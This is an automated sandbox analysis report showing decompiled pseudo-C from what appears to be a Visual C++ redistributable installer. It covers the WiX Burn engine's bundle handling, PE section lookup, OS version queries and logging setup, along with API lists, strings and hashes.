                                                                          												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t212 + 0x7c)) + _t210 * 8)) + 0x30)) = _t176;
                                                                          												_t177 =  *((intOrPtr*)(_t212 + 0x7c));
                                                                          												_t203 =  *((intOrPtr*)( *((intOrPtr*)(_t212 + 0x7c)) + _t210 * 8));
                                                                          												if( *((intOrPtr*)(_t203 + 0x30)) == 0) {
                                                                          													_t214 = 0x8007000e;
                                                                          													_t220 = 0x8007000e;
                                                                          													E000137D3(_t177, "pseudobundle.cpp", 0xc9, 0x8007000e);
                                                                          													_push("Failed to allocate memory for pseudo bundle payload hash.");
                                                                          													goto L2;
                                                                          												} else {
                                                                          													 *((intOrPtr*)(_t203 + 0x34)) =  *((intOrPtr*)( *_t224 + 0x34));
                                                                          													E00031664( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t212 + 0x7c)) + _t210 * 8)) + 0x30)),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t212 + 0x7c)) + _t210 * 8)) + 0x34)),  *((intOrPtr*)( *_t224 + 0x30)),  *((intOrPtr*)( *_t224 + 0x34)));
                                                                          													_t225 = _t225 + 0x10;
                                                                          													goto L15;
                                                                          												}
                                                                          											}
                                                                          										} else {
                                                                          											_t220 = E000121A5( *((intOrPtr*)( *((intOrPtr*)(_t212 + 0x7c)) + _a4 * 8)) + 0x40,  *((intOrPtr*)(_t173 + 0x40)), 0);
                                                                          											if(_t220 < 0) {
                                                                          												_push("Failed to copy download source for passthrough pseudo bundle.");
                                                                          												L23:
                                                                          												_push(_t220);
                                                                          												goto L3;
                                                                          											} else {
                                                                          												_t224 = _a24;
                                                                          												goto L12;
                                                                          											}
                                                                          										}
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          							goto L36;
                                                                          						}
                                                                          						_t214 = 0x8007000e;
                                                                          						_t220 = 0x8007000e;
                                                                          						E000137D3(_t150, "pseudobundle.cpp", 0xb3, 0x8007000e);
                                                                          						_push("Failed to allocate space for burn payload inside of related bundle struct");
                                                                          						goto L2;
                                                                          					}
                                                                          				} else {
                                                                          					_t214 = 0x8007000e;
                                                                          					_t220 = 0x8007000e;
                                                                          					E000137D3(_t121, "pseudobundle.cpp", 0xab, 0x8007000e);
                                                                          					_push("Failed to allocate space for burn package payload inside of passthrough bundle.");
                                                                          					L2:
                                                                          					_push(_t214);
                                                                          					L3:
                                                                          					E0005012F();
                                                                          				}
                                                                          				L36:
                                                                          				if(_v8 != 0) {
                                                                          					E000554EF(_v8);
                                                                          				}
                                                                          				return _t220;
                                                                          			}





















                                                                          0x0003c696
                                                                          0x0003c69b
                                                                          0x0003c6b2
                                                                          0x0003c6b7
                                                                          0x00000000
                                                                          0x0003c6b7
                                                                          0x0003c690
                                                                          0x0003c644
                                                                          0x0003c65b
                                                                          0x0003c65f
                                                                          0x0003c732
                                                                          0x0003c76d
                                                                          0x0003c76d
                                                                          0x00000000
                                                                          0x0003c665
                                                                          0x0003c665
                                                                          0x00000000
                                                                          0x0003c665
                                                                          0x0003c65f
                                                                          0x0003c642
                                                                          0x0003c633
                                                                          0x0003c60d
                                                                          0x00000000
                                                                          0x0003c5e7
                                                                          0x0003c773
                                                                          0x0003c783
                                                                          0x0003c785
                                                                          0x0003c78a
                                                                          0x00000000
                                                                          0x0003c78a
                                                                          0x0003c540
                                                                          0x0003c540
                                                                          0x0003c550
                                                                          0x0003c552
                                                                          0x0003c557
                                                                          0x0003c55c
                                                                          0x0003c55c
                                                                          0x0003c55d
                                                                          0x0003c55d
                                                                          0x0003c563
                                                                          0x0003c860
                                                                          0x0003c864
                                                                          0x0003c869
                                                                          0x0003c869
                                                                          0x0003c876

                                                                          Strings
                                                                          • Failed to copy key for passthrough pseudo bundle., xrefs: 0003C72B
                                                                          • Failed to copy install arguments for passthrough bundle package, xrefs: 0003C805
                                                                          • Failed to copy local source path for passthrough pseudo bundle., xrefs: 0003C75A
                                                                          • Failed to recreate command-line arguments., xrefs: 0003C7E6
                                                                          • Failed to copy related arguments for passthrough bundle package, xrefs: 0003C825
                                                                          • Failed to copy uninstall arguments for passthrough bundle package, xrefs: 0003C84F
                                                                          • Failed to copy download source for passthrough pseudo bundle., xrefs: 0003C732
                                                                          • Failed to allocate memory for pseudo bundle payload hash., xrefs: 0003C750
                                                                          • pseudobundle.cpp, xrefs: 0003C54B, 0003C744, 0003C77E
                                                                          • Failed to copy cache id for passthrough pseudo bundle., xrefs: 0003C7A8
                                                                          • Failed to copy filename for passthrough pseudo bundle., xrefs: 0003C761
                                                                          • Failed to allocate space for burn package payload inside of passthrough bundle., xrefs: 0003C557
                                                                          • Failed to copy key for passthrough pseudo bundle payload., xrefs: 0003C768
                                                                          • Failed to allocate space for burn payload inside of related bundle struct, xrefs: 0003C78A
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocateProcess
                                                                          • String ID: Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of passthrough bundle.$Failed to allocate space for burn payload inside of related bundle struct$Failed to copy cache id for passthrough pseudo bundle.$Failed to copy download source for passthrough pseudo bundle.$Failed to copy filename for passthrough pseudo bundle.$Failed to copy install arguments for passthrough bundle package$Failed to copy key for passthrough pseudo bundle payload.$Failed to copy key for passthrough pseudo bundle.$Failed to copy local source path for passthrough pseudo bundle.$Failed to copy related arguments for passthrough bundle package$Failed to copy uninstall arguments for passthrough bundle package$Failed to recreate command-line arguments.$pseudobundle.cpp
                                                                          • API String ID: 1357844191-115096447
                                                                          • Opcode ID: ca6dbdb78e9afbe432f3a3ba20842c4541727dfc79510381d6e713671e8699d8
                                                                          • Instruction ID: b12e4d7f2a02f7cf81bb50043c082b28a226e4ea3f74aae3fd00e2a1dc3c826d
                                                                          • Opcode Fuzzy Hash: ca6dbdb78e9afbe432f3a3ba20842c4541727dfc79510381d6e713671e8699d8
                                                                          • Instruction Fuzzy Hash: 01B13975A04616EFEB12DF68C881F99BBA5BF08710F114169FE14EB362C731E861DB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 23%
                                                                          			E0001B106(intOrPtr _a4) {
                                                                          				void* _t35;
                                                                          				signed short _t40;
                                                                          				intOrPtr* _t45;
                                                                          				void* _t47;
                                                                          				intOrPtr _t49;
                                                                          				signed int _t50;
                                                                          				signed int _t53;
                                                                          				intOrPtr _t56;
                                                                          				signed int _t57;
                                                                          				intOrPtr* _t61;
                                                                          				signed int _t62;
                                                                          				signed int _t63;
                                                                          				signed int _t64;
                                                                          
                                                                          				_t57 = 0;
                                                                          				_t61 = GetModuleHandleW(0);
                                                                          				if(_t61 != 0) {
                                                                          					if(0x5a4d ==  *_t61) {
                                                                          						_t49 =  *((intOrPtr*)(_t61 + 0x3c));
                                                                          						if( *((intOrPtr*)(_t49 + _t61)) == 0x4550) {
                                                                          							_t5 = _t61 + 0x18; // 0x18
                                                                          							_t45 = _t5 + ( *(_t49 + _t61 + 0x14) & 0x0000ffff) + _t49;
                                                                          							if(E0003F919(_t45, ".wixburn", 8) == 0) {
                                                                          								L13:
                                                                          								if( *((intOrPtr*)(_t45 + 0x10)) >= 0x34) {
                                                                          									_t47 =  *((intOrPtr*)(_t45 + 0xc)) + _t61;
                                                                          									if( *((intOrPtr*)(_t47 + 4)) == 2) {
                                                                          										_t56 = _a4;
                                                                          										_t50 = _t57;
                                                                          										while(1) {
                                                                          											_t26 =  *((intOrPtr*)(_t56 + _t50 * 4));
                                                                          											if( *((intOrPtr*)(_t56 + _t50 * 4)) !=  *((intOrPtr*)(_t47 + 8 + _t50 * 4))) {
                                                                          												break;
                                                                          											}
                                                                          											_t50 = _t50 + 1;
                                                                          											if(_t50 != 4) {
                                                                          												continue;
                                                                          											} else {
                                                                          											}
                                                                          											goto L25;
                                                                          										}
                                                                          										_t62 = 0x8007000d;
                                                                          										_t57 = 0x8007000d;
                                                                          										E000137D3(_t26, "section.cpp", 0x18a, 0x8007000d);
                                                                          										_push("Bundle guid didn\'t match the guid in the PE Header in memory.");
                                                                          										goto L24;
                                                                          									} else {
                                                                          										_t63 = 0x8007000d;
                                                                          										_t57 = 0x8007000d;
                                                                          										E000137D3(_t25, "section.cpp", 0x184, 0x8007000d);
                                                                          										_push( *((intOrPtr*)(_t47 + 4)));
                                                                          										_push("Failed to read section info, unsupported version: %08x");
                                                                          										goto L18;
                                                                          									}
                                                                          								} else {
                                                                          									_t63 = 0x8007000d;
                                                                          									_t57 = 0x8007000d;
                                                                          									E000137D3(_t25, "section.cpp", 0x17a, 0x8007000d);
                                                                          									_push( *((intOrPtr*)(_t45 + 0x10)));
                                                                          									_push("Failed to read section info, data to short: %u");
                                                                          									L18:
                                                                          									_push(_t63);
                                                                          									E0005012F();
                                                                          								}
                                                                          							} else {
                                                                          								_t53 =  *( *((intOrPtr*)(_t61 + 0x3c)) + _t61 + 6) & 0x0000ffff;
                                                                          								_t35 = 1;
                                                                          								while(_t35 < _t53) {
                                                                          									_t45 = _t45 + 0x28;
                                                                          									_t35 = _t35 + 1;
                                                                          									if( *_t45 != 0x7869772e ||  *((intOrPtr*)(_t45 + 4)) != 0x6e727562) {
                                                                          										continue;
                                                                          									} else {
                                                                          										goto L13;
                                                                          									}
                                                                          									goto L25;
                                                                          								}
                                                                          								_t62 = 0x8007000d;
                                                                          								_t57 = 0x8007000d;
                                                                          								E000137D3(_t35, "section.cpp", 0x16e, 0x8007000d);
                                                                          								_push("Failed to find Burn section.");
                                                                          								L24:
                                                                          								_push(_t62);
                                                                          								E0005012F();
                                                                          							}
                                                                          							L25:
                                                                          						} else {
                                                                          							_t64 = 0x8007000d;
                                                                          							_t57 = 0x8007000d;
                                                                          							E000137D3(0x5a4d, "section.cpp", 0x155, 0x8007000d);
                                                                          							_push("Failed to find valid NT image header in buffer.");
                                                                          							goto L5;
                                                                          						}
                                                                          					} else {
                                                                          						_t64 = 0x8007000d;
                                                                          						_t57 = 0x8007000d;
                                                                          						E000137D3(0x5a4d, "section.cpp", 0x14a, 0x8007000d);
                                                                          						_push("Failed to find valid DOS image header in buffer.");
                                                                          						L5:
                                                                          						_push(_t64);
                                                                          						goto L2;
                                                                          					}
                                                                          				} else {
                                                                          					_t40 = GetLastError();
                                                                          					_t60 =  <=  ? _t40 : _t40 & 0x0000ffff | 0x80070000;
                                                                          					_t57 =  >=  ? 0x80004005 :  <=  ? _t40 : _t40 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "section.cpp", 0x140, _t57);
                                                                          					_push("Failed to get module handle to process.");
                                                                          					_push(_t57);
                                                                          					L2:
                                                                          					E0005012F();
                                                                          				}
                                                                          				return _t57;
                                                                          			}

















                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000,00000000,00000000,?,0001B9F7,00000008,?,00000000,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 0001B10E
                                                                          • GetLastError.KERNEL32(?,0001B9F7,00000008,?,00000000,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 0001B11A
                                                                          • _memcmp.LIBVCRUNTIME ref: 0001B1C2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorHandleLastModule_memcmp
                                                                          • String ID: .wix$.wixburn$@Met$Bundle guid didn't match the guid in the PE Header in memory.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get module handle to process.$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$burn$section.cpp
                                                                          • API String ID: 3888311042-2963902760
                                                                          • Opcode ID: ef584cfb80040fc13d865f3369223c37d94abd314fade434384cd182f8d8a108
                                                                          • Instruction ID: 7e27c0426dc39465b0f6ea893244fda3db0243f176917395bc946926e992ad20
                                                                          • Opcode Fuzzy Hash: ef584cfb80040fc13d865f3369223c37d94abd314fade434384cd182f8d8a108
                                                                          • Instruction Fuzzy Hash: 97412B72384711B7D7355951DC42FFB32A6AF40B22F254029FE065F5C2D778CA8983A6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 55%
                                                                          			E000167E5(signed int __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                          				signed int _v8;
                                                                          				signed short _v16;
                                                                          				signed short _v284;
                                                                          				signed short _v288;
                                                                          				char _v292;
                                                                          				int _v296;
                                                                          				signed int _v300;
                                                                          				intOrPtr _v308;
                                                                          				signed int _v320;
                                                                          				signed int _v324;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t30;
                                                                          				struct HINSTANCE__** _t36;
                                                                          				_Unknown_base(*)()* _t37;
                                                                          				void* _t40;
                                                                          				void* _t50;
                                                                          				signed short _t55;
                                                                          				signed short _t57;
                                                                          				signed short _t60;
                                                                          				intOrPtr _t63;
                                                                          				signed int _t64;
                                                                          				signed int _t73;
                                                                          				void* _t74;
                                                                          				void* _t75;
                                                                          				void* _t76;
                                                                          				void* _t78;
                                                                          				signed int _t85;
                                                                          
                                                                          				_t73 = __edx;
                                                                          				_t30 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t30 ^ _t85;
                                                                          				_t63 = _a8;
                                                                          				_v296 = 0;
                                                                          				E0003F670(_t74,  &_v292, 0, 0x11c);
                                                                          				_t75 =  &_v324;
                                                                          				_t64 = 6;
                                                                          				memset(_t75, 0, _t64 << 2);
                                                                          				_t76 = _t75 + _t64;
                                                                          				_t36 =  &_v296;
                                                                          				__imp__GetModuleHandleExW(0, L"ntdll", _t36);
                                                                          				if(_t36 != 0) {
                                                                          					_t37 = GetProcAddress(_v296, "RtlGetVersion");
                                                                          					if(_t37 != 0) {
                                                                          						_v292 = 0x11c;
                                                                          						_t78 =  *_t37( &_v292);
                                                                          						if(_t78 >= 0) {
                                                                          							_t40 = _a4 - 1;
                                                                          							if(_t40 == 0) {
                                                                          								L12:
                                                                          								_v308 = 3;
                                                                          								_v324 = _v324 & 0x00000000;
                                                                          								asm("cdq");
                                                                          								_v320 = (_v288 & 0x0000ffff) << 0x00000010 | _v284 & 0x0000ffff;
                                                                          								L13:
                                                                          								_t78 = E0002FF73(_t73,  &_v324, _t63);
                                                                          								if(_t78 >= 0) {
                                                                          									goto L16;
                                                                          								}
                                                                          								_push("Failed to set variant value.");
                                                                          								goto L15;
                                                                          							}
                                                                          							_t50 = _t40 - 1;
                                                                          							if(_t50 == 0) {
                                                                          								_v300 = _v300 & 0x00000000;
                                                                          								E000509BB( &_v292, GetCurrentProcess(),  &_v300);
                                                                          								if(_v300 == 0) {
                                                                          									goto L13;
                                                                          								}
                                                                          								goto L12;
                                                                          							}
                                                                          							if(_t50 == 1) {
                                                                          								_t55 = _v16;
                                                                          								if(0 != _t55) {
                                                                          									asm("cdq");
                                                                          									_v324 = _t55 & 0x0000ffff;
                                                                          									_v320 = _t73;
                                                                          									_v308 = 1;
                                                                          								}
                                                                          							}
                                                                          							goto L13;
                                                                          						}
                                                                          						_push("Failed to get OS info.");
                                                                          						goto L15;
                                                                          					}
                                                                          					_t57 = GetLastError();
                                                                          					_t81 =  <=  ? _t57 : _t57 & 0x0000ffff | 0x80070000;
                                                                          					_t78 =  >=  ? 0x80004005 :  <=  ? _t57 : _t57 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "variable.cpp", 0x662, _t78);
                                                                          					_push("Failed to locate RtlGetVersion.");
                                                                          					goto L15;
                                                                          				} else {
                                                                          					_t60 = GetLastError();
                                                                          					_t84 =  <=  ? _t60 : _t60 & 0x0000ffff | 0x80070000;
                                                                          					_t78 =  >=  ? 0x80004005 :  <=  ? _t60 : _t60 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "variable.cpp", 0x65c, _t78);
                                                                          					_push("Failed to locate NTDLL.");
                                                                          					L15:
                                                                          					_push(_t78);
                                                                          					E0005012F();
                                                                          					L16:
                                                                          					if(_v296 != 0) {
                                                                          						FreeLibrary(_v296);
                                                                          					}
                                                                          					return E0003DE36(_t63, _v8 ^ _t85, _t73, _t76, _t78);
                                                                          				}
                                                                          			}


































                                                                          APIs
                                                                          • GetModuleHandleExW.KERNEL32(00000000,ntdll,?), ref: 00016835
                                                                          • GetLastError.KERNEL32 ref: 0001683F
                                                                          • GetProcAddress.KERNEL32(?,RtlGetVersion), ref: 00016882
                                                                          • GetLastError.KERNEL32 ref: 0001688C
                                                                          • FreeLibrary.KERNEL32(00000000,00000000,?), ref: 0001699D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$AddressFreeHandleLibraryModuleProc
                                                                          • String ID: @Met$Failed to get OS info.$Failed to locate NTDLL.$Failed to locate RtlGetVersion.$Failed to set variant value.$RtlGetVersion$ntdll$variable.cpp
                                                                          • API String ID: 3057421322-2963171980
                                                                          • Opcode ID: 983b75bf8ad2dcbc4a6bbb352ac74a74f12725e0f037e4403de8ce3f9a4cdb5b
                                                                          • Instruction ID: 06a29c5c0621dba637f7eb86ee63f3305b6cbc9cd1c076ef9939ae46af0c5482
                                                                          • Opcode Fuzzy Hash: 983b75bf8ad2dcbc4a6bbb352ac74a74f12725e0f037e4403de8ce3f9a4cdb5b
                                                                          • Instruction Fuzzy Hash: F641B371D003389BEB319B65CC05BEFBAE8EB08751F00019AED48F6191E7758E94CA95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 72%
                                                                          			E000147E9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12) {
                                                                          				void* _v8;
                                                                          				char _v12;
                                                                          				void* __ebx;
                                                                          				long _t28;
                                                                          				signed short _t29;
                                                                          				signed short _t53;
                                                                          				signed short _t56;
                                                                          				void* _t65;
                                                                          				intOrPtr _t67;
                                                                          				signed short _t71;
                                                                          				signed short _t75;
                                                                          				signed short _t78;
                                                                          
                                                                          				_t65 = __edx;
                                                                          				_push(__ecx);
                                                                          				_push(__ecx);
                                                                          				_t67 = _a12;
                                                                          				_v8 = 0;
                                                                          				_v12 = 0;
                                                                          				if(E00024933(0, __ecx, _t67 + 0x4a0, 1) >= 0) {
                                                                          					_t28 = TlsAlloc();
                                                                          					 *(_t67 + 0x498) = _t28;
                                                                          					__eflags = _t28 - 0xffffffff;
                                                                          					if(_t28 != 0xffffffff) {
                                                                          						_t29 = TlsSetValue(_t28,  *(_t67 + 0x4b0));
                                                                          						__eflags = _t29;
                                                                          						if(_t29 != 0) {
                                                                          							E0005058B(E0001444C, _t67);
                                                                          							_t71 = E0002E82A(_a4, _t67);
                                                                          							__eflags = _t71;
                                                                          							if(_t71 >= 0) {
                                                                          								E00051B28(_t65, 1);
                                                                          								_t71 = E0002D01A( *(_t67 + 0x498),  *(_t67 + 0x4b0),  *((intOrPtr*)(_t67 + 0x4b4)), _t67 + 0x3d8, _t67 + 0x2a8, _t67 + 0x2c0, _t67 + 0x2b8, _t67 + 0x88, _t67 + 0x100, _t67 + 0xb8,  &_v8,  &_v12, _t67 + 0xf8, _t67 + 0x18);
                                                                          								E0005058B(0, 0);
                                                                          								__eflags = _t71;
                                                                          								if(_t71 < 0) {
                                                                          									_push("Failed to pump messages from parent process.");
                                                                          									goto L10;
                                                                          								}
                                                                          							} else {
                                                                          								_push("Failed to create the message window.");
                                                                          								goto L10;
                                                                          							}
                                                                          						} else {
                                                                          							_t53 = GetLastError();
                                                                          							__eflags = _t53;
                                                                          							_t75 =  <=  ? _t53 : _t53 & 0x0000ffff | 0x80070000;
                                                                          							__eflags = _t75;
                                                                          							_t71 =  >=  ? 0x80004005 : _t75;
                                                                          							E000137D3(0x80004005, "engine.cpp", 0x251, _t71);
                                                                          							_push("Failed to set elevated pipe into thread local storage for logging.");
                                                                          							goto L10;
                                                                          						}
                                                                          					} else {
                                                                          						_t56 = GetLastError();
                                                                          						__eflags = _t56;
                                                                          						_t78 =  <=  ? _t56 : _t56 & 0x0000ffff | 0x80070000;
                                                                          						__eflags = _t78;
                                                                          						_t71 =  >=  ? 0x80004005 : _t78;
                                                                          						E000137D3(0x80004005, "engine.cpp", 0x24c, _t71);
                                                                          						_push("Failed to allocate thread local storage for logging.");
                                                                          						goto L10;
                                                                          					}
                                                                          				} else {
                                                                          					_push("Failed to connect to unelevated process.");
                                                                          					L10:
                                                                          					_push(_t71);
                                                                          					E0005012F();
                                                                          				}
                                                                          				E0005058B(0, 0);
                                                                          				E0002E7EB(_t67);
                                                                          				_t80 = _v12;
                                                                          				if(_v12 != 0) {
                                                                          					E0002D156(_t80);
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					ReleaseMutex(_v8);
                                                                          					CloseHandle(_v8);
                                                                          				}
                                                                          				return _t71;
                                                                          			}















                                                                          APIs
                                                                          • TlsAlloc.KERNEL32(?,00000001,00000001,00000000,00000000,?,?,?,0001535E,?,?,?,?), ref: 0001481A
                                                                          • GetLastError.KERNEL32(?,?,?,0001535E,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0001482B
                                                                          • ReleaseMutex.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00014968
                                                                          • CloseHandle.KERNEL32(?,?,?,?,0001535E,?,?,?,?,?,?,?,?,?,?,?), ref: 00014971
                                                                          Strings
                                                                          • Failed to create the message window., xrefs: 000148C6
                                                                          • comres.dll, xrefs: 000148D7
                                                                          • user.cpp, xrefs: 0001484F, 00014898
                                                                          • Failed to connect to unelevated process., xrefs: 00014810
                                                                          • Failed to pump messages from parent process., xrefs: 0001493C
                                                                          • Failed to allocate thread local storage for logging., xrefs: 00014859
                                                                          • Failed to set elevated pipe into thread local storage for logging., xrefs: 000148A2
                                                                          • @Met, xrefs: 0001482B, 00014874
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AllocCloseErrorHandleLastMutexRelease
                                                                          • String ID: @Met$Failed to allocate thread local storage for logging.$Failed to connect to unelevated process.$Failed to create the message window.$Failed to pump messages from parent process.$Failed to set elevated pipe into thread local storage for logging.$comres.dll$user.cpp
                                                                          • API String ID: 687263955-3997268840
                                                                          • Opcode ID: 141fd93809a9456fd9aec30df892af74b2b4f24e1a02c2d5d7dddc8a08b52b54
                                                                          • Instruction ID: 41068c4e20bc0c746b7025d2705a2249a5f1e2fb1646d7b41c57443160356f01
                                                                          • Opcode Fuzzy Hash: 141fd93809a9456fd9aec30df892af74b2b4f24e1a02c2d5d7dddc8a08b52b54
                                                                          • Instruction Fuzzy Hash: 384194B2A00615BBEB119BB5CC86EEFB6ACFF04711F100226FE05E6151DB70AD5587E0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 51%
                                                                          			E000239FD(void* __edx, void* __edi, intOrPtr _a4) {
                                                                          				signed int _v8;
                                                                          				short _v528;
                                                                          				short* _v532;
                                                                          				int _v536;
                                                                          				char _v540;
                                                                          				char _v544;
                                                                          				void* __ebx;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t29;
                                                                          				long _t39;
                                                                          				signed short _t54;
                                                                          				intOrPtr _t57;
                                                                          				void* _t64;
                                                                          				void* _t65;
                                                                          				intOrPtr _t66;
                                                                          				intOrPtr _t67;
                                                                          				void* _t70;
                                                                          				signed int _t72;
                                                                          				signed int _t76;
                                                                          
                                                                          				_t65 = __edi;
                                                                          				_t64 = __edx;
                                                                          				_t29 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t29 ^ _t76;
                                                                          				_t57 = _a4;
                                                                          				E0003F670(__edi,  &_v528, 0, 0x208);
                                                                          				_v544 = 0;
                                                                          				_v532 = 0;
                                                                          				_v540 = 0;
                                                                          				_v536 = 0;
                                                                          				if(GetTempPathW(0x104,  &_v528) != 0) {
                                                                          					_t70 = E00011C57( &_v528, 0x104,  &_v540);
                                                                          					if(_t70 >= 0) {
                                                                          						_t39 = GetCurrentProcessId();
                                                                          						__imp__ProcessIdToSessionId(_t39,  &_v544, _t65);
                                                                          						if(_t39 == 0) {
                                                                          							_t66 = _v540;
                                                                          							goto L12;
                                                                          						} else {
                                                                          							_t70 = E00011F20( &_v532, L"%u\\", _v544);
                                                                          							if(_t70 >= 0) {
                                                                          								_t70 = E00011C57(_v532, 0x7fffffff,  &_v536);
                                                                          								if(_t70 >= 0) {
                                                                          									_t67 = _v540;
                                                                          									_t72 = _t67 - _v536;
                                                                          									CompareStringW(0, 0,  &(( &_v528)[_t72]), _v536, _v532, _v536);
                                                                          									_t66 =  ==  ? _t72 : _t67;
                                                                          									L12:
                                                                          									_t70 = E000121A5(_t57,  &_v528, _t66);
                                                                          									if(_t70 < 0) {
                                                                          										_push("Failed to copy temp folder.");
                                                                          										goto L14;
                                                                          									}
                                                                          								} else {
                                                                          									_push("Failed to get length of session id string.");
                                                                          									goto L14;
                                                                          								}
                                                                          							} else {
                                                                          								_push("Failed to format session id as a string.");
                                                                          								L14:
                                                                          								_push(_t70);
                                                                          								E0005012F();
                                                                          							}
                                                                          						}
                                                                          						_pop(_t65);
                                                                          					} else {
                                                                          						_push("Failed to get length of temp folder.");
                                                                          						goto L2;
                                                                          					}
                                                                          				} else {
                                                                          					_t54 = GetLastError();
                                                                          					_t75 =  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
                                                                          					_t70 =  >=  ? 0x80004005 :  <=  ? _t54 : _t54 & 0x0000ffff | 0x80070000;
                                                                          					E000137D3(0x80004005, "logging.cpp", 0x271, _t70);
                                                                          					_push("Failed to get temp folder.");
                                                                          					L2:
                                                                          					_push(_t70);
                                                                          					E0005012F();
                                                                          				}
                                                                          				if(_v532 != 0) {
                                                                          					E000554EF(_v532);
                                                                          				}
                                                                          				return E0003DE36(_t57, _v8 ^ _t76, _t64, _t65, _t70);
                                                                          			}























                                                                          APIs
                                                                          • GetTempPathW.KERNEL32(00000104,?,?,00000000,crypt32.dll), ref: 00023A51
                                                                          • GetLastError.KERNEL32(?,00000000,crypt32.dll), ref: 00023A5B
                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,00000104,?,?,00000000,crypt32.dll), ref: 00023AC4
                                                                          • ProcessIdToSessionId.KERNEL32(00000000,?,00000000,crypt32.dll), ref: 00023ACB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CurrentErrorLastPathSessionTemp
